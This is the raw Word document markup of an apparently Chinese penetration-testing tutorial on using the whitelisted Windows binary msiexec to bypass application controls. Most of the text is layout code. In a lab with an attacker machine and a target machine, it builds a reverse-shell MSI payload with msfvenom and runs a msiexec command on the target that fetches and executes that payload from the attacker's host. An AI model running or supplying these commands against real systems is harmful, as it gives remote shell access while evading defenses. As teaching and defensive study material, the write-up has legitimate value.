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8.874pt;margin-top:412.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,8257" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:8257;width:82;height:322" coordorigin="1177,8257" coordsize="82,322" path="m1217,8263l1217,8263,1217,8263,1217,8263,1217,8263,1217,8263,1217,8263,1217,8263,1217,8263,1217,8263,1217,8263,1217,8263,1217,8263,1217,8263,1217,8264,1217,8264,1217,8264,1217,8264,1217,8264,1217,8264,1217,8264,1217,8265,1217,8265,1217,8265,1217,8265,1217,8266,1217,8266,1217,8266,1217,8267,1217,8267,1217,8268,1217,8268,1217,8268,1217,8269,1217,8270,1217,8270,1217,8271,1217,8271,1217,8272,1217,8273,1217,8274,1217,8275,1217,8275,1217,8276,1217,8277,1217,8278,1217,8279,1217,8281,1217,8282,1217,8283,1217,8284,1217,8285,1217,8287,1217,8288,1217,8290,1217,8291,1217,8293,1217,8294,1217,8296,1217,8298,1217,8300,1217,8302,1217,8304,1217,8306,1217,8308,1217,8310,1217,8312,1217,8314,1217,8317,1217,8319,1217,8322,1217,8324,1217,8327,1217,8330,1217,8332,1217,8335,1217,8338,1217,8341,1217,8344,1217,8348,1217,8351,1217,8354,1217,8358,1217,8361,1217,8365,1217,8369,1217,8373,1217,8376,1217,8380,1217,8385,1217,8389,1217,8393,1217,8397,1217,8402,1217,8406,1217,8411,1217,8416,1217,8421,1217,8426,1217,8431,1217,8436,1217,8441,1217,8447,1217,8452,1217,8458,1217,8464,1217,8469,1217,8475,1217,8481,1217,8488,1217,8494,1217,8500,1217,8507,1217,8513,1217,8520,1217,8527,1217,8534,1217,8541,1217,8548,1217,8556,1217,8563e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:427.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,8557" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:8557;width:82;height:322" coordorigin="1177,8557" coordsize="82,322" path="m1217,8563l1217,8563,1217,8563,1217,8563,1217,8563,1217,8563,1217,8563,1217,8563,1217,8563,1217,8563,1217,8563,1217,8563,1217,8564,1217,8564,1217,8564,1217,8564,1217,8564,1217,8564,1217,8564,1217,8564,1217,8565,1217,8565,1217,8565,1217,8565,1217,8565,1217,8566,1217,8566,1217,8566,1217,8567,1217,8567,1217,8568,1217,8568,1217,8569,1217,8569,1217,8570,1217,8570,1217,8571,1217,8572,1217,8572,1217,8573,1217,8574,1217,8575,1217,8576,1217,8577,1217,8577,1217,8578,1217,8580,1217,8581,1217,8582,1217,8583,1217,8584,1217,8586,1217,8587,1217,8588,1217,8590,1217,8591,1217,8593,1217,8595,1217,8596,1217,8598,1217,8600,1217,8602,1217,8604,1217,8606,1217,8608,1217,8610,1217,8612,1217,8615,1217,8617,1217,8619,1217,8622,1217,8624,1217,8627,1217,8630,1217,8633,1217,8635,1217,8638,1217,8642,1217,8645,1217,8648,1217,8651,1217,8655,1217,8658,1217,8662,1217,8665,1217,8669,1217,8673,1217,8677,1217,8681,1217,8685,1217,8689,1217,8693,1217,8698,1217,8702,1217,8707,1217,8711,1217,8716,1217,8721,1217,8726,1217,8731,1217,8736,1217,8741,1217,8747,1217,8752,1217,8758,1217,8764,1217,8770,1217,8775,1217,8782,1217,8788,1217,8794,1217,8800,1217,8807,1217,8814,1217,8820,1217,8827,1217,8834,1217,8841,1217,8849,1217,8856,1217,8863e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7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646" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="5755" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>注：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请多喝点热水</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>或者凉白开，身体特别重要。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="13"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>M</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>siexec简介：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="1" w:after="0" w:line="323" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="1238" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Msiexec是Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="3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Installer的一部分。用于安装Windows</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="3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Installer安装包（MSI）,一般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在运行Microsoft</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="-28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Update安装更新或安装部分软件的时候出现，占用内存比较大。并且集</w:t>
      </w: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成于Windows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2003，Windows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pacing w:val="22"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7等。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646" w:lineRule="auto"/>
        <w:ind w:left="1120" w:right="1163" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="de3f29"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>说明：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Msiexec.exe所在路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径已被系统添加PATH环境变量中，因此，Msiexec命令可识别。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基于白名单Msiexec.exe配置paylo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ad：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="1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2003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默认位置：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="295" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="243" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="13"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>C:\WINDOWS\system</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="12"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>32\msiexec.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="23" w:after="0" w:line="243" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="0" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="20"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>C:\WINDOWS\SysWOW64\msiexe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="19"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>c.exe</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="27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"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>攻击机：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192.168.1.4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="57"/>
        </w:rPr>
        <w:t> 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Debian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9"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>靶机：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t> 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192.168.1.119</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:spacing w:val="10"/>
        </w:rPr>
        <w:t>  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2003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配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置攻击机msf：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74.500pt;margin-top:388.500pt;width:449.500pt;height:33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,7770" coordsize="8990,670">
        <v:shape style="position:absolute;left:1490;top:7770;width:8990;height:670" coordorigin="1490,7770" coordsize="8990,670" path="m1510,7783l1510,7783,1510,7783,1510,7783,1510,7783,1510,7783,1510,7783,1511,7783,1512,7783,1512,7783,1514,7783,1515,7783,1517,7783,1519,7783,1521,7783,1524,7783,1528,7783,1532,7783,1536,7783,1541,7783,1546,7783,1552,7783,1559,7783,1566,7783,1575,7783,1583,7783,1593,7783,1603,7783,1615,7783,1627,7783,1640,7783,1654,7783,1668,7783,1684,7783,1701,7783,1719,7783,1738,7783,1758,7783,1780,7783,1802,7783,1826,7783,1851,7783,1877,7783,1904,7783,1933,7783,1963,7783,1995,7783,2028,7783,2063,7783,2099,7783,2136,7783,2175,7783,2216,7783,2259,7783,2303,7783,2348,7783,2396,7783,2445,7783,2496,7783,2549,7783,2604,7783,2660,7783,2719,7783,2779,7783,2841,7783,2906,7783,2972,7783,3041,7783,3112,7783,3184,7783,3259,7783,3336,7783,3416,7783,3498,7783,3582,7783,3668,7783,3757,7783,3848,7783,3941,7783,4037,7783,4136,7783,4236,7783,4340,7783,4446,7783,4555,7783,4666,7783,4780,7783,4897,7783,5017,7783,5139,7783,5264,7783,5392,7783,5523,7783,5657,7783,5793,7783,5933,7783,6076,7783,6222,7783,6370,7783,6522,7783,6677,7783,6835,7783,6997,7783,7161,7783,7329,7783,7500,7783,7675,7783,7853,7783,8034,7783,8219,7783,8407,7783,8598,7783,8793,7783,8992,7783,9194,7783,9400,7783,9609,7783,9823,7783,10039,7783,10260,7783,10484,7783,10484,7783,10484,7783,10484,7783,10484,7783,10484,7783,10484,7783,10484,7783,10484,7783,10484,7783,10484,7783,10484,7783,10484,7783,10484,7784,10484,7784,10484,7784,10484,7784,10484,7785,10484,7785,10484,7785,10484,7786,10484,7786,10484,7787,10484,7787,10484,7788,10484,7788,10484,7789,10484,7790,10484,7791,10484,7792,10484,7793,10484,7794,10484,7795,10484,7796,10484,7797,10484,7799,10484,7800,10484,7802,10484,7803,10484,7805,10484,7807,10484,7809,10484,7811,10484,7813,10484,7815,10484,7817,10484,7819,10484,7822,10484,7825,10484,7827,10484,7830,10484,7833,10484,7836,10484,7839,10484,7843,10484,7846,10484,7850,10484,7853,10484,7857,10484,7861,10484,7865,10484,7869,10484,7874,10484,7878,10484,7883,10484,7888,10484,7893,10484,7898,10484,7903,10484,7909,10484,7915,10484,7920,10484,7926,10484,7933,10484,7939,10484,7945,10484,7952,10484,7959,10484,7966,10484,7973,10484,7981,10484,7988,10484,7996,10484,8004,10484,8012,10484,8020,10484,8029,10484,8038,10484,8047,10484,8056,10484,8065,10484,8075,10484,8085,10484,8095,10484,8105,10484,8116,10484,8127,10484,8137,10484,8149,10484,8160,10484,8172,10484,8184,10484,8196,10484,8208,10484,8221,10484,8234,10484,8247,10484,8260,10484,8274,10484,8288,10484,8302,10484,8316,10484,8331,10484,8346,10484,8361,10484,8377,10484,8392,10484,8408,10484,8425,10484,8441,10484,8458,10484,8458,10484,8458,10484,8458,10484,8458,10484,8458,10484,8458,10483,8458,10482,8458,10482,8458,10480,8458,10479,8458,10477,8458,10475,8458,10473,8458,10470,8458,10466,8458,10462,8458,10458,8458,10453,8458,10448,8458,10442,8458,10435,8458,10428,8458,10419,8458,10411,8458,10401,8458,10391,8458,10379,8458,10367,8458,10354,8458,10340,8458,10326,8458,10310,8458,10293,8458,10275,8458,10256,8458,10236,8458,10215,8458,10192,8458,10168,8458,10143,8458,10117,8458,10090,8458,10061,8458,10031,8458,9999,8458,9966,8458,9931,8458,9895,8458,9858,8458,9819,8458,9778,8458,9735,8458,9691,8458,9646,8458,9598,8458,9549,8458,9498,8458,9445,8458,9391,8458,9334,8458,9275,8458,9215,8458,9153,8458,9088,8458,9022,8458,8953,8458,8883,8458,8810,8458,8735,8458,8658,8458,8578,8458,8497,8458,8413,8458,8326,8458,8238,8458,8146,8458,8053,8458,7957,8458,7859,8458,7758,8458,7654,8458,7548,8458,7439,8458,7328,8458,7214,8458,7097,8458,6977,8458,6855,8458,6730,8458,6602,8458,6471,8458,6337,8458,6201,8458,6061,8458,5918,8458,5773,8458,5624,8458,5472,8458,5317,8458,5159,8458,4997,8458,4833,8458,4665,8458,4494,8458,4319,8458,4141,8458,3960,8458,3776,8458,3587,8458,3396,8458,3201,8458,3002,8458,2800,8458,2594,8458,2385,8458,2172,8458,1955,8458,1734,8458,1510,8458,1510,8458,1510,8458,1510,8458,1510,8458,1510,8458,1510,8458,1510,8458,1510,8458,1510,8458,1510,8458,1510,8458,1510,8458,1510,8458,1510,8457,1510,8457,1510,8457,1510,8457,1510,8456,1510,8456,1510,8456,1510,8455,1510,8455,1510,8454,1510,8453,1510,8453,1510,8452,1510,8451,1510,8450,1510,8449,1510,8448,1510,8447,1510,8446,1510,8445,1510,8444,1510,8443,1510,8441,1510,8440,1510,8438,1510,8436,1510,8434,1510,8433,1510,8431,1510,8429,1510,8426,1510,8424,1510,8422,1510,8419,1510,8417,1510,8414,1510,8411,1510,8408,1510,8405,1510,8402,1510,8399,1510,8395,1510,8392,1510,8388,1510,8384,1510,8380,1510,8376,1510,8372,1510,8367,1510,8363,1510,8358,1510,8353,1510,8348,1510,8343,1510,8338,1510,8332,1510,8327,1510,8321,1510,8315,1510,8309,1510,8302,1510,8296,1510,8289,1510,8282,1510,8275,1510,8268,1510,8261,1510,8253,1510,8245,1510,8237,1510,8229,1510,8221,1510,8212,1510,8203,1510,8194,1510,8185,1510,8176,1510,8166,1510,8156,1510,8146,1510,8136,1510,8125,1510,8115,1510,8104,1510,8092,1510,8081,1510,8069,1510,8058,1510,8045,1510,8033,1510,8020,1510,8007,1510,7994,1510,7981,1510,7967,1510,7953,1510,7939,1510,7925,1510,7910,1510,7895,1510,7880,1510,7865,1510,7849,1510,7833,1510,7816,1510,7800,1510,7783e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:387.600pt;width:445.800pt;height:35.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId7" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:519.500pt;margin-top:606.500pt;width:0.500pt;height:33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10390,12130" coordsize="10,670">
        <v:shape style="position:absolute;left:10390;top:12130;width:10;height:670" coordorigin="10390,12130" coordsize="10,670" path="m10402,12150l10402,12150,10402,12150,10402,12150,10402,12150,10402,12150,10402,12150,10402,12150,10402,12150,10402,12150,10402,12150,10402,12151,10402,12151,10402,12151,10402,12151,10402,12151,10402,12151,10402,12152,10402,12152,10402,12152,10402,12153,10402,12153,10402,12154,10402,12154,10402,12155,10402,12156,10402,12156,10402,12157,10402,12158,10402,12159,10402,12160,10402,12161,10402,12162,10402,12163,10402,12164,10402,12166,10402,12167,10402,12168,10402,12170,10402,12172,10402,12173,10402,12175,10402,12177,10402,12179,10402,12181,10402,12184,10402,12186,10402,12188,10402,12191,10402,12193,10402,12196,10402,12199,10402,12202,10402,12205,10402,12208,10402,12212,10402,12215,10402,12219,10402,12223,10402,12227,10402,12231,10402,12235,10402,12239,10402,12244,10402,12248,10402,12253,10402,12258,10402,12263,10402,12268,10402,12273,10402,12279,10402,12285,10402,12290,10402,12296,10402,12303,10402,12309,10402,12315,10402,12322,10402,12329,10402,12336,10402,12343,10402,12351,10402,12358,10402,12366,10402,12374,10402,12382,10402,12391,10402,12399,10402,12408,10402,12417,10402,12426,10402,12436,10402,12445,10402,12455,10402,12465,10402,12476,10402,12486,10402,12497,10402,12508,10402,12519,10402,12530,10402,12542,10402,12554,10402,12566,10402,12578,10402,12591,10402,12604,10402,12617,10402,12630,10402,12644,10402,12658,10402,12672,10402,12686,10402,12701,10402,12716,10402,12731,10402,12746,10402,12762,10402,12778,10402,12794,10402,12810e" filled="f" stroked="t" strokeweight="0.750pt" strokecolor="#e6e8eb">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:74.500pt;margin-top:606.500pt;width:449.500pt;height:33.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1490,12130" coordsize="8990,670">
        <v:shape style="position:absolute;left:1490;top:12130;width:8990;height:670" coordorigin="1490,12130" coordsize="8990,670" path="m1510,12150l1510,12150,1510,12150,1510,12150,1510,12150,1510,12150,1510,12150,1511,12150,1512,12150,1512,12150,1514,12150,1515,12150,1517,12150,1519,12150,1521,12150,1524,12150,1528,12150,1532,12150,1536,12150,1541,12150,1546,12150,1552,12150,1559,12150,1566,12150,1575,12150,1583,12150,1593,12150,1603,12150,1615,12150,1627,12150,1640,12150,1654,12150,1668,12150,1684,12150,1701,12150,1719,12150,1738,12150,1758,12150,1780,12150,1802,12150,1826,12150,1851,12150,1877,12150,1904,12150,1933,12150,1963,12150,1995,12150,2028,12150,2063,12150,2099,12150,2136,12150,2175,12150,2216,12150,2259,12150,2303,12150,2348,12150,2396,12150,2445,12150,2496,12150,2549,12150,2604,12150,2660,12150,2719,12150,2779,12150,2841,12150,2906,12150,2972,12150,3041,12150,3112,12150,3184,12150,3259,12150,3336,12150,3416,12150,3498,12150,3582,12150,3668,12150,3757,12150,3848,12150,3941,12150,4037,12150,4136,12150,4236,12150,4340,12150,4446,12150,4555,12150,4666,12150,4780,12150,4897,12150,5017,12150,5139,12150,5264,12150,5392,12150,5523,12150,5657,12150,5793,12150,5933,12150,6076,12150,6222,12150,6370,12150,6522,12150,6677,12150,6835,12150,6997,12150,7161,12150,7329,12150,7500,12150,7675,12150,7853,12150,8034,12150,8219,12150,8407,12150,8598,12150,8793,12150,8992,12150,9194,12150,9400,12150,9609,12150,9823,12150,10039,12150,10260,12150,10484,12150,10484,12150,10484,12150,10484,12150,10484,12150,10484,12150,10484,12150,10484,12150,10484,12150,10484,12150,10484,12150,10484,12151,10484,12151,10484,12151,10484,12151,10484,12151,10484,12151,10484,12152,10484,12152,10484,12152,10484,12153,10484,12153,10484,12154,10484,12154,10484,12155,10484,12156,10484,12156,10484,12157,10484,12158,10484,12159,10484,12160,10484,12161,10484,12162,10484,12163,10484,12164,10484,12166,10484,12167,10484,12168,10484,12170,10484,12172,10484,12173,10484,12175,10484,12177,10484,12179,10484,12181,10484,12184,10484,12186,10484,12188,10484,12191,10484,12193,10484,12196,10484,12199,10484,12202,10484,12205,10484,12208,10484,12212,10484,12215,10484,12219,10484,12223,10484,12227,10484,12231,10484,12235,10484,12239,10484,12244,10484,12248,10484,12253,10484,12258,10484,12263,10484,12268,10484,12273,10484,12279,10484,12285,10484,12290,10484,12296,10484,12303,10484,12309,10484,12315,10484,12322,10484,12329,10484,12336,10484,12343,10484,12351,10484,12358,10484,12366,10484,12374,10484,12382,10484,12391,10484,12399,10484,12408,10484,12417,10484,12426,10484,12436,10484,12445,10484,12455,10484,12465,10484,12476,10484,12486,10484,12497,10484,12508,10484,12519,10484,12530,10484,12542,10484,12554,10484,12566,10484,12578,10484,12591,10484,12604,10484,12617,10484,12630,10484,12644,10484,12658,10484,12672,10484,12686,10484,12701,10484,12716,10484,12731,10484,12746,10484,12762,10484,12778,10484,12794,10484,12810,10484,12810,10484,12810,10484,12810,10484,12810,10484,12810,10484,12810,10483,12810,10482,12810,10482,12810,10480,12810,10479,12810,10477,12810,10475,12810,10473,12810,10470,12810,10466,12810,10462,12810,10458,12810,10453,12810,10448,12810,10442,12810,10435,12810,10428,12810,10419,12810,10411,12810,10401,12810,10391,12810,10379,12810,10367,12810,10354,12810,10340,12810,10326,12810,10310,12810,10293,12810,10275,12810,10256,12810,10236,12810,10215,12810,10192,12810,10168,12810,10143,12810,10117,12810,10090,12810,10061,12810,10031,12810,9999,12810,9966,12810,9931,12810,9895,12810,9858,12810,9819,12810,9778,12810,9735,12810,9691,12810,9646,12810,9598,12810,9549,12810,9498,12810,9445,12810,9391,12810,9334,12810,9275,12810,9215,12810,9153,12810,9088,12810,9022,12810,8953,12810,8883,12810,8810,12810,8735,12810,8658,12810,8578,12810,8497,12810,8413,12810,8326,12810,8238,12810,8146,12810,8053,12810,7957,12810,7859,12810,7758,12810,7654,12810,7548,12810,7439,12810,7328,12810,7214,12810,7097,12810,6977,12810,6855,12810,6730,12810,6602,12810,6471,12810,6337,12810,6201,12810,6061,12810,5918,12810,5773,12810,5624,12810,5472,12810,5317,12810,5159,12810,4997,12810,4833,12810,4665,12810,4494,12810,4319,12810,4141,12810,3960,12810,3776,12810,3587,12810,3396,12810,3201,12810,3002,12810,2800,12810,2594,12810,2385,12810,2172,12810,1955,12810,1734,12810,1510,12810,1510,12810,1510,12810,1510,12810,1510,12810,1510,12810,1510,12810,1510,12810,1510,12810,1510,12810,1510,12810,1510,12810,1510,12810,1510,12810,1510,12810,1510,12809,1510,12809,1510,12809,1510,12809,1510,12808,1510,12808,1510,12807,1510,12807,1510,12806,1510,12806,1510,12805,1510,12804,1510,12804,1510,12803,1510,12802,1510,12801,1510,12800,1510,12799,1510,12798,1510,12796,1510,12795,1510,12794,1510,12792,1510,12791,1510,12789,1510,12787,1510,12785,1510,12783,1510,12781,1510,12779,1510,12777,1510,12775,1510,12772,1510,12770,1510,12767,1510,12764,1510,12761,1510,12758,1510,12755,1510,12752,1510,12749,1510,12745,1510,12742,1510,12738,1510,12734,1510,12730,1510,12726,1510,12722,1510,12717,1510,12712,1510,12708,1510,12703,1510,12698,1510,12693,1510,12687,1510,12682,1510,12676,1510,12670,1510,12664,1510,12658,1510,12652,1510,12645,1510,12638,1510,12632,1510,12625,1510,12617,1510,12610,1510,12602,1510,12594,1510,12586,1510,12578,1510,12570,1510,12561,1510,12552,1510,12543,1510,12534,1510,12525,1510,12515,1510,12505,1510,12495,1510,12485,1510,12474,1510,12464,1510,12453,1510,12442,1510,12430,1510,12419,1510,12407,1510,12395,1510,12382,1510,12370,1510,12357,1510,12344,1510,12330,1510,12317,1510,12303,1510,12289,1510,12275,1510,12260,1510,12245,1510,12230,1510,12214,1510,12199,1510,12183,1510,12167,1510,12150e x" fillcolor="#f6f6f6" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:74.400pt;margin-top:606.600pt;width:445.800pt;height:33.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" type="#_x0000_t75">
        <v:imagedata r:id="rId8" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:48.600pt;width:467.400pt;height:278.399pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId9" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:442.800pt;width:467.400pt;height:52.200pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId10" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:514.799pt;width:467.400pt;height:30.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId11" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:660.600pt;width:323.399pt;height:112.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId12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87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配置payl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oad：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msfvenom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windows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x64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shell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reverse_tcp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LHOST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=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LPORT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=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f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msi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Micropoor_rev_x64_53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txt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88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靶</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>机执行：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C:\Windows\System32\msiexec</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="2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exe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q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i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//192.168.1.4/Micropoor_rev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_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x64_53.txt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499.200pt;width:7.200pt;height:7.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId13" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:69.599pt;width:467.400pt;height:81.599pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId14" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:170.400pt;width:467.400pt;height:280.800pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId15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83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9599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Micr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